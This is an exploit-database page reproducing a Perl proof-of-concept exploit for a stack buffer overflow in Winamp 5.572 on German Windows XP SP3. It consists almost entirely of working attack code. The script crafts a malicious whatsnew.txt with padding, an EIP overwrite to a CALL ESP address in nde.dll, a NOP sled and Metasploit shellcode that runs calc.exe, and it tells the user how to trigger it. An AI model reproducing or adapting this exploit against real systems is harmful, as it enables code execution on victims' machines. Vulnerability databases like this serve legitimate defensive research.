Vulners
Lucene search
Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De
# Tested on: WinXP SP3 De
#!/usr/bin/perl
# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.
print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow #\n";
print "# PoC by: Debug (eldadru\@gmail.com) #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";
print " __ __________________\n";
print " ________ / \\ / / ____ / ____ / ________\n";
print " ________ /_______/ / /\\ \\ / / /___/ / / / / /_______/ ________ \n";
print " /_______/ _______ / / \\ \\ / / /_____/ / / / ________ /_______/\n";
print " /_______/ / / \\ \\/ / /_____/ /___/ / /_______/\n";
print " /_/ \\__/_______/_______/\n";
print " Where's the next phone box to the matrix please?\n\n\n";
my $version = "Winamp 5.572";
my $junk = "\x41" x 540;
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD FFD4 CALL ESP nde.dll
my $nop = "\x90" x 100;
my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";
open (myfile,'>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;
print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1